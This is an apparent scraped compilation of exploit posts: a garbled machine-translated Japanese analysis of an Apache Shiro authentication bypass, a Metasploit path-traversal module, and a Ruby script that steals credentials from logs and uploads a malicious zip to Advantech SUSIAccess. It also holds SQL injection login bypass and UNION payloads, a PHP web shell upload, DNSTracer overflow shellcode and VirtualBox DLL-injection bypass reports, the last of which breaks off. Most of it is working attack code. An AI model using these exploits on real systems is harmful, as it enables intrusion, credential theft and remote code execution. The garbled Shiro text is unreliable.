vul_ip=xxx.xxx.xxx.xxxはDockerサーバーIPであり、127.0.0.1.1.http://192.168.1.1.14:8080/ログイン1049983-20201129040312412-1520455583.png

0x04脆弱性の再発

1。 AuthCインターセプターによって傍受され、ログインのためにログインインターフェイスにジャンプすることがわかります。1049983-20201129040312899-107128082.pngアクセス/hello/1/、authcインターセプターを正常にバイパスし、リソースを取得しました。

1049983-20201129040313397-685140363.png2、Shiro 1.4.2バージョンバイパス脆弱性分析脆弱性は、PathMatchingFilterChainResolverのゲットチェーン関数の下に配置できます。この関数は、URLパスマッチングで構成されたURLパス式に基づいて入力URLと一致し、インターセプターが一致するかどうかを判断します。正常に一致すると、応答インターセプター実行チェーンが返され、Shirofitherが許可操作を実行できます。 URLパス式と入力URLの一致は、主にPathmathches関数を介して一致します。1enxkmd2er37651.pngPathMatches関数は、最終的にaNT形式でDomatchのPathpatternとRequesturiを呼び出して、shiro.util.antpathmatcherクラスのdomatchのpathpatternとrequesturiに一致します。 //pathmatches:135、pathmatchingfilterchainresolver(org.apache.shiro.web.filter.mgt)

保護されたブールパスマッチ(String Pattern、String Path){

patternMatcher pathMatcher=this.getPathMatcher();

pathmatcher.matches(パターン、パス)を返す;

}

domatch:109、antpathmatcher(org.apache.shiro.util)、shiroのアリ形式のpathpatternのワイルドカードが一致するパスをサポートしない場合、/hello/*は正常に一致することはできません。これにより、Shiroインターセプターをうまくバイパスし、スプリングインターセプターに入りました。 /hello/1/and//hello/1は同じリソースを取得できます。1049983-20201129040314275-1093796335.jpg3、shiro≤1.5.1バージョンバージョン1.5.1のバージョンバイパス、/hello/はログイン1049983-20201129040314835-1924922284.pngバイパスペイロード、/fdsf;1049983-20201129040315283-20701281.pngまたはその他のペイロード、xxxx/./hello/1、suctionfully bypassed(shiro 1.5.1 and its以前のバージョン) /xxxx/./hello/1、最終リクエスト/こんにちは、バックグラウンドリクエストに正常にアクセスされました。 Shiro≤1.5.1の脆弱性分析の問題は、Getchain関数に配置して、Requesturiを取得することもできます。下の図に示すように、this.getPathWithinApplication(要求)によって取得されたrequesturiは/fdsfではなく、/fdsfではありません。wpemiyal5b17655.png webutils(org.apache.shiro.web.util)のgetRequesturi関数は、requesturiを取得するために呼び出されます。 public static string getRequesturi(httpservletrequestリクエスト){

string uri=(string)request.getattribute( 'javax.servlet.include.request_uri');

if(uri==null){

uri=request.getRequesturi();

}

return remormize(decodeandcleanuristring(request、uri));

}

DeCodeandCleanuristring関数は、URIをクリーニングするためにRequesturi関数で最終的に呼び出されます。

private static string decodeandcleanuristring(httpservletrequest request、string uri){

uri=decoderequestString(request、uri);

int semicolonindex=uri.indexof(59); //番号の場所を取得します

return semicolonindex!=-1? uri.substring(0、semicolonindex): uri;

}

ある場合; URIの番号、すべての文字が削除されます。 /fdsf;/./hello/1/は最終的に/fdsfになりました。t22s543k1xb7656.png5。脆弱性の概要WebコンテナのShiroのインターセプターは、最初にSpring(サーブレット)で実行されます。 2つのインターセプター間のURIパターンマッチングの違いは、シロインターセプターをバイパスすることにつながります。シロはそれを2回修理しました。 Shiro 1.4.2の脆弱性は、Requesturiの後に /番号を削除するためのURLパスに一致する脆弱性でした。メソッドを追加/番号を追加するための簡単な修正と見なされます。次に、1.5.2で、Requesturiの自律的スプライシングを使用した方法が修正されました。 /fdsf; /./hello/1/など。 requesturiを使用してメソッドをバイパスします。

0x05修理計画

1。シロ1.5.2にバージョン1.5.2以上に追加されたフィルタールールをアップグレードします。 dottestgetpathwithinapplicationfromrequest( ''、 '/servlet'、 '/foobar'、 '/servlet/foobar') '/foobar'、 '/servlet/foobar')dottestgetpathwithinapplicationfromrequest( '/'、 'servlet'、 '/foobar'、 '/servlet/foobar') dottestgetpathwithinapplicationfromrequest( '//'、 '//servlet'、 '/servlet/foobar')dottestgetpathwithinapplicationfromrequest( '/context-path'、 '/servlet'、 '/foobar'、 '/servet/foobar')DottestetheTheThiNInplicationFromequest( 「//サーブレット」、 '//foobar'、 '/servlet/foobar')dottestgetpathwithinapplicationfromrequest( '//context-path'、 '/servlet'、 '/asdf'、 '//servlet/other'、 '/servet/other')dottesttetpathin fromrequest ';/./servlet/other'、 '/asdf')dottestgetpathwithinapplicationfromrequest( '/context%2525path'、 '/servlet'、 '/foobar'、 '/servlet/foobar')dottestgetpathwithinapplicationfromrequest( '/c%6fnext%20path'、fobar '/servlet/foobar')dottestgetpathwithinapplicationfromrequest( '/context path'、 '/servlet'、 '/foobar'、 '/servlet/foobar')dottestgetpathwithinapplicationfromrequest( ''、 ''、null、 '/' null、 '/index.jsp')}

2。ダイナミックルーティングインターセプターのURLパス式として *ワイルドカードを使用しないようにしてください。

0x06参照

https://www.zhihuifly.com/t/topic/2822 https://paper.sebug.org/1196/https://xz.aliyun.com/t/8281

HireHackking 
libao memory corruption vulnerability
================
Author : qflb.wu
===============


Introduction:
=============
Libao is a cross-platform audio library that allows programs to output audio using a simple API on a wide variety of platforms.


Affected version:
=====
1.2.0


Vulnerability Description:
==========================
the _tokenize_matrix function in audio_out.c in Xiph.Org libao 1.2.0 can cause a denial of service(memory corruption) via a crafted mp3 file.


I found this bug when I test mpg321 0.3.2 which used the libao library.


./mpg321 libao_1.2.0_memory_corruption.mp3


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
_int_malloc (av=av@entry=0x7ffff6f7f760 <main_arena>, bytes=bytes@entry=3)
    at malloc.c:3740
3740malloc.c: No such file or directory.
(gdb) bt
#0  _int_malloc (av=av@entry=0x7ffff6f7f760 <main_arena>, bytes=bytes@entry=3)
    at malloc.c:3740
#1  0x00007ffff6c442cc in __libc_calloc (n=<optimized out>, 
    elem_size=<optimized out>) at malloc.c:3219
#2  0x00007ffff728e189 in _tokenize_matrix () from /usr/local/lib/libao.so.4
#3  0x00007ffff728e607 in _matrix_to_channelmask ()
   from /usr/local/lib/libao.so.4
#4  0x00007ffff72906f2 in _open_device () from /usr/local/lib/libao.so.4
#5  0x000000000040a6aa in open_ao_playdevice (header=header@entry=0x624af8)
    at ao.c:411
#6  0x0000000000407e50 in output (data=<optimized out>, header=0x624af8, 
    pcm=0x627f44) at mad.c:974
#7  0x00007ffff749a85c in run_sync (decoder=0x7fffffffbc40) at decoder.c:439
#8  0x00007ffff749ab38 in mad_decoder_run (
    decoder=decoder@entry=0x7fffffffbc40, 
    mode=mode@entry=MAD_DECODER_MODE_SYNC) at decoder.c:557
#9  0x0000000000403d5d in main (argc=<optimized out>, argv=<optimized out>)
    at mpg321.c:1092
(gdb) 


POC:
libao_1.2.0_memory_corruption.mp3
CVE:
CVE-2017-11548


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42400.zip
HireHackking 
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Advantech SUSIAccess Server Directory Traversal Information Disclosure',
			'Description'    => %q{
				This module exploits an information disclosure vulnerability found in
				Advantech SUSIAccess <= version 3.0. The vulnerability is triggered when
				sending a GET request to the server with a series of dot dot slashes (../)
				in the file parameter. 
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2016-9349' ],
					[ 'ZDI', '16-628' ],
					[ 'BID', '94629' ],
					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04' ]
				],
			'DisclosureDate' => 'Dec 13 2016'))

		register_options(
			[
				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
				Opt::RPORT(8080)
			], self.class )
	end

	def run

	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
	levels = "/" + ("../" * depth)

	file = "#{levels}#{datastore['FILE']}"
	file = file.gsub(/ /, "%20")

	res = send_request_raw({
		'method'	=> 'GET',
		'uri'		=> "/downloadCSV.jsp?file=#{file}",
	})

	if res and res.code == 200
		loot = res.body
		if not loot or loot.empty?
			print_status("File from #{rhost}:#{rport} is empty...")
			return
		end
		file = ::File.basename(datastore['FILE'])
		path = store_loot('advantech_susiaccess.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
		print_status("Stored #{datastore['FILE']} to #{path}")
		return
	else
		print_error("Something went wrong... Application returned a #{res.code}")
	end

	end
end
__END__
<%@ page import="java.util.*,java.io.*" %>               
<%
 File f = new File (getServletContext().getRealPath("/") + request.getParameter("file") );
 //set the content type(can be excel/word/powerpoint etc..)
 response.setContentType ("application/csv");
 //set the header and also the Name by which user will be prompted to save
 response.setHeader ("Content-Disposition", "attachment; filename=\""+request.getParameter("file").split("/")[2] +"\"");
 
 //get the file name
 String name = f.getName().substring(f.getName().lastIndexOf("/") + 1,f.getName().length());
 //OPen an input stream to the file and post the file contents thru the 
 //servlet output stream to the client m/c
 
  InputStream in = new FileInputStream(f);
  ServletOutputStream outs = response.getOutputStream();
  
  
  int bit = 256;
  int i = 0;
  try {
   while ((bit) >= 0) {
    bit = in.read();
    outs.write(bit);
   }
   //System.out.println("" +bit);
  } catch (IOException ioe) {
   ioe.printStackTrace(System.out);
  }
//  System.out.println( "n" + i + " bytes sent.");
//  System.out.println( "n" + f.length() + " bytes sent.");
  outs.flush();
  outs.close();
  in.close(); 

%>
HireHackking 
#!/usr/bin/env ruby

=begin
Exploit Title: Advantech SUSIAccess RecoveryMgmt File Upload
Date: 07/31/17
Exploit Author: james fitts 
Vendor Homepage: http://www.advantech.com/
Version: Advantech SUSIAccess <= 3.0
Tested on: Windows 7 SP1
Relavant Advisories:
	ZDI-16-630
	ZDI-16-628
	CVE-2016-9349
	CVE-2016-9351
	BID-94629
	ICSA-16-336-04

Notes:
	This PoC will upload AcronisInstaller.exe to the root of C:\
	You can modify this to drop files where ever you want on the
	filesystem.

	By default the script will use the directory traversal vuln
	to pull down the log files and parse for the base64 encoded
	credentials. Once it has that, it will use them to log into
	the application and upload the malicious zip file.
=end

require 'mime/types'
require 'fileutils'
require 'net/http'
require 'nokogiri'
require 'base64'
require 'digest'
require 'date'
require 'uri'
require 'zip'

def uploadZip(target, creds, cookies)
	uri = URI("http://#{target}:8080/webresources/RecoveryMgmt/upload")
	bound = "AaBbCcDdEe"

	path = Dir.pwd
	zipfile = "#{path}/update.zip"

	post_data = []
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_LastUpdateName\""
	post_data << "\r\n\r\n\r\n"
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_UploadFileFullName\""
	post_data << "\r\n\r\nupdate.zip\r\n"
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_Content\""
	post_data << "\r\n\r\n"
	post_data << "<request Authorization=\"#{creds[0].to_s}\"/>\r\n"
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_FileInput\"; filename=\"update.zip\""
	post_data << "\r\nContent-Type: application/zip"
	post_data << "\r\n\r\n"
	post_data << File.read(zipfile)
	post_data << "\r\n\r\n--#{bound}--\r\n"

	req = Net::HTTP::Post.new(uri, initheader = {
			'Cookie'						=>	cookies,
			'Authorization'			=>	"Basic #{creds[0].to_s}",
			'X-Requested-With'	=>	"XMLHttpRequest",
			'Content-Type'			=>	"multipart/form-data; boundary=#{bound}",
			'User-Agent'				=>	"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
			'Accept-Language'		=>	"en-US,en;q=0.5",
			'Accept'						=>	"text/plain, */*; q=0.01",
			'Connection'				=>	"close"
	})

	req.body = post_data.join

	http = Net::HTTP.new("#{target}", 8080)
	res = http.start {|http| http.request(req)}

	if res.code =~ /200/
		puts "[+] Upload successful!"
	end
end

def craftZip(target, payload)
	path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml"

	uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}")
	res = Net::HTTP.get_response(uri)
	xml = Nokogiri::XML(res.body)
	ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/version').to_s.split("=")[1].split("\"")[1]
	kern_ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/kernal_version').to_s.split("=")[1].split("\"")[1]

	# version information doesn't matter
	# the application will still extract the zip
	# file regardless of whether or not its
	# a greater version or lesser
	f = File.open("LatestVersion.txt", 'w')
	f.puts("Installer Version: #{ver}\r\nApplication Version: #{kern_ver}")
	f.close

	f = File.open("md5.txt", 'w')
	md5 = Digest::MD5.hexdigest(File.read("AcronisInstaller.exe"))
	f.puts md5
	f.close

	path = Dir.pwd
	zipfile = "#{path}/update.zip"

	if File.exist?(zipfile)
		FileUtils.rm(zipfile)
	end

	files = ["AcronisInstaller.exe", "LatestVersion.txt", "md5.txt"]

	levels = "../" * 10
	Zip::File.open(zipfile, Zip::File::CREATE) do |zip|
		files.each do |fname|
			if fname == "AcronisInstaller.exe"
				zip.add("#{levels}#{fname}", fname)
			end
			zip.add(fname, fname)
		end
	end

	if File.exist?(zipfile)
		puts "[!] Malicious zip created successfully"
	end
end

def doLogin(target, creds)
	formattedDate = DateTime.now.strftime("%a %b %d %Y %H:%M:%S GMT-0400 (EDT)")
	formattedDate = URI::encode(formattedDate)

	uri = URI("http://#{target}:8080/frmServer.jsp?d=#{formattedDate}")

	res = Net::HTTP.get_response(uri)
	jsessid = res.header['Set-Cookie'].split(';')[0]
	cookies = "deviceType=pc; log4jq=OFF; selectedLang=en_US; #{jsessid}"

	uname = Base64.decode64(creds[0].to_s).split(":")[0]
	pass = Base64.decode64(creds[0].to_s).split(":")[1]

	data = "<request Authorization=\"#{creds[0].to_s}\">"
	data << "<item name=\"username\" value=\"#{uname}\"/>"
	data << "<item name=\"password\" value=\"#{pass}\"/>"
	data << "</request>"

	puts "[+] Attempting login with pilfered credentials now"
	uri = URI("http://#{target}:8080/webresources/AccountMgmt/Login")

	req = Net::HTTP::Post.new(uri, initheader = {
		'Content-Type'      =>  "application/xml",
		'Cookies'           =>  cookies,
		'Authorization'     =>  "Basic #{creds[0].to_s}",
		'X-Requested-With'  =>  'XMLHttpRequest'
	})

	req.body = data

	http = Net::HTTP.new("#{target}", 8080)
	res = http.start {|http| http.request(req)}

	if res.body =~ /<result><role name/
		puts "[+] Login successful!"
		return cookies
	else
		puts "[-] Something went wrong..."
	end
	
end

def getCreds(target)
	cnt = 1
	d = Date.today
	d.strftime("%y-%m-%d")
	creds = []

	while cnt < 31
		fdate = d - cnt
		cnt += 1

		path = "../../../../../../../../../../Program Files\\Apache Software Foundation\\logs\\"
		file = "localhost_access_log.#{fdate}.txt"
		full_path = path + file

		uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{full_path}")

		res = Net::HTTP.get_response(uri)

		if res.code =~ /200/
			creds << res.body.scan(/(?<=Authorization=%22)[A-Za-z0-9=]+/)
		end
	end
	return creds.flatten.uniq
end

##
# Main
##
if ARGV.length != 1
	puts "Usage:\r\n\truby #{$0} [TARGET IP]"
else
	target = ARGV[0]
	payload = "AcronisInstaller.exe"
	
	puts "[+] Extracting credentials now..."
	credentials = getCreds(target)
	if credentials.length > 0
		puts "[!] Credentials found!"
		cookies = doLogin(target, credentials)
		puts "[+] Crafting malicious zip now..."
		craftZip(target, payload)
		uploadZip(target, credentials, cookies)
	else
		puts "[-] Credentials not found.. Try searching for more log files.."
		exit
	end
end
HireHackking 
[*] Type: Admin or Customer login bypass via SQL injection
[*] Author: Touhid M.Shaikh
[*] Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
[*] Mail: touhidshaikh22[at]gmail[dot]com
[*] More info: https://blog.touhidshaikh.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


===================== PoC ================

Admin Login Page : http://127.0.0.1/emplogin.php
Customer Login Page : http://127.0.0.1/login.php


Navigate admin login page or Customer Login Page and submit ' OR 1 --+ for
username and password




and it should give you access to the admin area or Customer Area.


Regards.
Touhid Shaikh
HireHackking 
# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload
# Exploit Author: Touhid M.Shaikh
# Date: 1/08/2017
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on : Kali Linux 2.0 64 bit and Windows 7



===================
Vulnerable Page:
===================

http://192.168.1.13/sellvehicle.php

====================
Vulnerable Source:
====================


--------------------------------PHP code-----------
<?php
if(isset($_POST["submit"]))
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $_FILES["file"]["name"]);


--------------------------------------------------

-----------------------HTML Form -----------------
<label for="images"></label>
      <label for="file"></label>
      <input type="file" name="file" id="file" /><input type="hidden"
name="image"  />

-----------------------------------------------------------------------

U can upload Shell or File via Regular or customer User Account.

 ================= POC ======================

We need to login any customer account or create an account (
http://192.168.1.13/registration.php) and login.

After customer panel open Navigate to
http://192.168.1.13/sellvehicle.php

and feed data and upload you unrestricted file.

--------------------------Request---------------------------

POST /sellvehicle.php HTTP/1.1
Host: 192.168.1.13
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------144421253520516158491092952973
Content-Length: 1085
Referer: http://192.168.1.13/sellvehicle.php
Cookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10
Connection: close
Upgrade-Insecure-Requests: 1

.
.
.
.skip

Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>

.
.
.
.skip
------------------------------------------------------------------------------

--------------------------Rsponse --------------------------
HTTP/1.1 200 OK
Date: Mon, 31 Jul 2017 20:38:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 2909
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------


====================================================================

Now You Can Access you Shell or File in /upload/backdoor.php

http://192.168.1.13/upload/backdoor.php


Enjoy !

Regards.
Touhid Shaikh
HireHackking 
# # # # #
# Exploit Title: De-Workshop - Auto Workshop Portal 1.0 - SQL Injection
# Dork: N/A
# Date: 11.08.2017
# Vendor Homepage : https://sarutech.com/
# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737
# Demo: https://demo.sarutech.com/deworkshop/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an technician users to inject sql commands....
#
# Vulnerable Source:
# .....................
# $customer = getCustomer($_GET['id']);
# ?>
# ....
# $ddaa = $pdo->query("SELECT * FROM vehicle WHERE customer='".$_GET['id']."' order by id desc");
# .....................
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/vehicleadd.php?id=[SQL]
# -2'++UNION(SELECT+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129)--+-
# 
# http://localhost/[PATH]/customerpage.php?id=[SQL]
# 
# http://localhost/[PATH]/fileadd.php?id=[SQL]
# 
# http://localhost/[PATH]/email.php?id=[SQL]
# 
# Etc...
# # # # #
HireHackking 
# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php


# Proof of Concept
import os
from subprocess import call

def run():
    try:
        print "\nDNSTracer Stack-based Buffer Overflow"
        print "Author: j0lama"
        print "Tested with Dnstracer compile without buffer overflow protection"

        nops = "\x90"*1006
        shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
        filling = "A"*24
        eip = "\x2f\xeb\xff\xbf"

        #buf size = 1057
        buf = nops + shellcode + filling + eip

        call(["./dnstracer", buf])

    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "\nDnstracer not found!\n"
        else:
            print "\nError executing exploit\n"
        raise


if __name__ == '__main__':
    try:
        run()
    except Exception as e:
        print "Something went wrong"
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1257

VirtualBox: Windows Process DLL Signature Bypass EoP
Platform: VirtualBox v5.1.22 r115126 x64 (Tested on Windows 10)
Class: Elevation of Privilege

Summary:
The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process giving access to the VBoxDrv driver which can allow routes to EoP from a normal user.

Description:
 
NOTE: I don’t know if you consider this an issue or not, however you fixed the last bypass I sent so it’s possible you still consider it a security boundary.
 
The ring 3 process hardening in VirtualBox adds three hooks to module loading to try and prevent untrusted code being loaded into the process, LdrLoadDll, NtCreateSection and a LDR DLL notification. Each will try and verify a DLL load and either reject the load with an error or kill the process is it’s not possible to prevent it from occurring. Looking at the hooks there a couple of issues which when combined together allow a user to inject an arbitrary DLL into a protected process.
 
The location checks are not very rigorous. As far as I can tell arbitrary files need to be owned by an admin/trustedinstaller but this check is waived if the file is in system32/WinSxS. However this doesn’t take into account that there are some directories which can be written to inside system32 such as Tasks.
The code to enforce specific certificates doesn’t seem to be enabled so at the very least combined with 1, you can load any validly signed file.
 
It might be considered that 2 isn’t an issue as getting a signing cert could be a sufficient burden for a “malicious” attacker, so instead it’s worth considering what else the weak path checking allows you to do. The handling of DLL paths has some interesting behaviours, most interestingly there’s the behaviour where if no file extension is added to the path then the loader will automatically append .DLL to it. This is actually implemented inside LdrLoadDll, this leads to our third problem:
 
3.  If the path passed to LdrLoadDll doesn’t have an extension then the protection code will signature check the extension less file but the loader will load the file with a .DLL extension. E.g. if trying to load \path\abc then \path\abc is signature checked but \path\abc.dll is loaded. 
 
When combined with the ability to bypass the owner check we can drop an arbitrary valid signed file alongside our untrusted DLL and exploit this TOCTOU to load an arbitrary unsigned DLL. The following will show inside the VboxHardening.log when loading the file testdll.
 
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll: Owner is not trusted installer
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
2064.492c: supHardenedWinVerifyImageByHandle: -> 0 (\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll) WinVerifyTrust
2064.492c: supR3HardenedWinVerifyCacheInsert: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll
2064.492c: supR3HardenedMonitor_LdrLoadDll: pName=c:\windows\system32\tasks\dummy\testdll (rcNtResolve=0xc0150008) *pfFlags=0x0 pwszSearchPath=0000000000002009:<flags> [calling]
 
This shows that it successfully passed the signature check inside the LdrLoadDll hook, however one of the other hooks should try and recheck the real testdll.dll file when it gets loaded instead. As the name of this file won’t match the cached signature check it should still fail to complete loading. This is where the fourth issue comes in:
 
4. When doing the check inside supHardenedWinVerifyImageByHandle with WinVerifyTrust disabled (i.e. when in the DLL load notification hook) and the target file has no signature information an incorrect error code is returned which looks like success leading to the DLL being allowed to load and execute. 
 
Specifically when supR3HardenedDllNotificationCallback is called it passes true to the fAvoidWinVerifyTrust parameter of supR3HardenedScreenImage. This first uses the RT code to check if the file is signed or not, if we use an unsigned file then this will return the error VERR_LDRVI_NOT_SIGNED (-22900). Later in supHardenedWinVerifyImageByLdrMod this error is checked and the function supHardNtViCheckIfNotSignedOk is called. This seems to result in the error coding changing from an error to VINF_LDRVI_NOT_SIGNED (22900) which is actually a success code. Normally this would be overridden again by the call to WinVerifyTrust but because that’s disabled the final result of this process is the DLL notification callback thinks the signature check was successful even though it wasn’t. This results in the DLL being allowed to complete loading.
 
For example the following is a snippet of the output when the bypass occurs.
 
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll: Owner is not trusted installer 
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
2064.492c: supR3HardenedWinVerifyCacheScheduleImports: Import todo: #1 'user32.dll'.
2064.492c: supR3HardenedWinVerifyCacheScheduleImports: Import todo: #2 'advapi32.dll'.
2064.492c: supHardenedWinVerifyImageByHandle: -> 22900 (\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll)
2064.492c: supR3HardenedWinVerifyCacheInsert: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll
2064.492c: supR3HardenedDllNotificationCallback: load   00007ff8a8600000 LB 0x00027000 c:\windows\system32\tasks\dummy\testdll.DLL [fFlags=0x0]
2064.492c: supR3HardenedScreenImage/LdrLoadDll: cache hit (Unknown Status 22900 (0x5974)) on \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll [avoiding WinVerifyTrust]
2064.492c: Detected loader lock ownership: rc=Unknown Status 22900 (0x5974) '\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll'.
2064.492c: supR3HardenedWinVerifyCacheProcessWvtTodos: 22900 (was 22900) fWinVerifyTrust=0 for '\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll' [rescheduled]
 
This combination of issues results in being able to inject arbitrary executable code into a VirtualBox protected process and access the resources such as the kernel driver that this would provide.

Proof of Concept:

I’ve provided a PoC DLL which will be loaded through abusing the VBox COM Client loading process in source form. I’ve also provided a registry file which will need to be imported.
 
Prerequisites: 
The DLL must be compiled in release mode for the architecture you’re going to run VirtualBox on. Then follow these steps:
 
1) Create the directory c:\windows\system32\tasks\dummy on the command line using ‘mkdir c:\windows\system32\tasks\dummy’
2) Import the provided .reg file to setup the COM hijack using the command line ‘reg import keys.reg’
3) Copy a valid signed file (such as VirtualBox.exe) to the file c:\windows\system32\tasks\dummy\testdll.
4) Copy the compiled PoC dll to c:\windows\system32\tasks\dummy\testdll.dll.
5) Start a VM. Each process the DLL is injected into will show a message box. This will include the protected VirtualBox.exe process.

Expected Result:
Untrusted DLL loading should fail inside a protected process.

Observed Result:
DLL is loaded into the protected process.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42425.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1296

VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP
Platform: VirtualBox v5.1.22 r115126 x64 (Tested on Windows 10)
Class: Elevation of Privilege

Summary:
The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process giving access to the VBoxDrv driver which can allow routes to EoP from a normal user.

Description:
 
NOTE: I don’t know if you consider this an issue or not, however you fixed the last bypass I sent so it’s possible you still consider it a security boundary.

This is a similar issue in impact to the one I reported in S0867394 but it uses a completely different mechanism. Once again we can use a current user COM registration to redirect the VBOX COM object to an arbitrary DLL path. However in this case rather than using MS signed code or abusing path behaviours in DLL library loading (and a bug in the hardening code) we'll instead abuse the way Windows handles image mapping from a kernel perspective.

On Windows mapped DLLs use an Image Section under the hood. This is a special type of file mapping where the parsing and relocating of the PE file is all handled by the kernel. To allow for sharing of image mappings (so ideally the kernel only needs to do the parsing and relocation once) the kernel memory manager ties the file object to an existing section object by using a unique section pointer set by the file system driver. The interesting thing about this is the section pointer doesn't necessarily ensure the file hasn't changed, just that the file system considered the file the "same". Therefore it's possible that opening a file and reading it returns a completely different PE file than the one you'll get if you then map that file as an image section.

If we can get a file mapped via one section pointer, then change the file underneath to be a different one we can exploit this. However on a default NTFS drive this isn't really possible due to things like sharing (outside of having admin privileges) so we need to use something different. For that we can use the SMB client file system. When you open a file via a UNC path any queries for the path return a MUP device path such as \Device\Mup\server\share\path\file.dll. When this is first mapped into memory the section pointer is used to refer to any file with that same path, however when opening the file the SMB client still needs to go to the server and receive the current data. Even with SMB supporting locking hopefully you can see that if you control the server as an admin then all bets are off with regards to returning the same data. In the worst case you could compile SAMBA with some custom code to do the attack (not that it would be needed). SMB also supports all the necessary file operations the hardening code checks for such as requesting the file Owner so we can pass all the checks with this. So to do the attack we can do the following:

1. Load our untrusted DLL from \\server\share\path\file.dll and map it into memory using something like LoadLibrary. This mapping needs to stay valid for the entire exploit to work.
2. Change the untrusted DLL file on the server to one which is a valid file for the hardening code and also has a owner set appropriately.
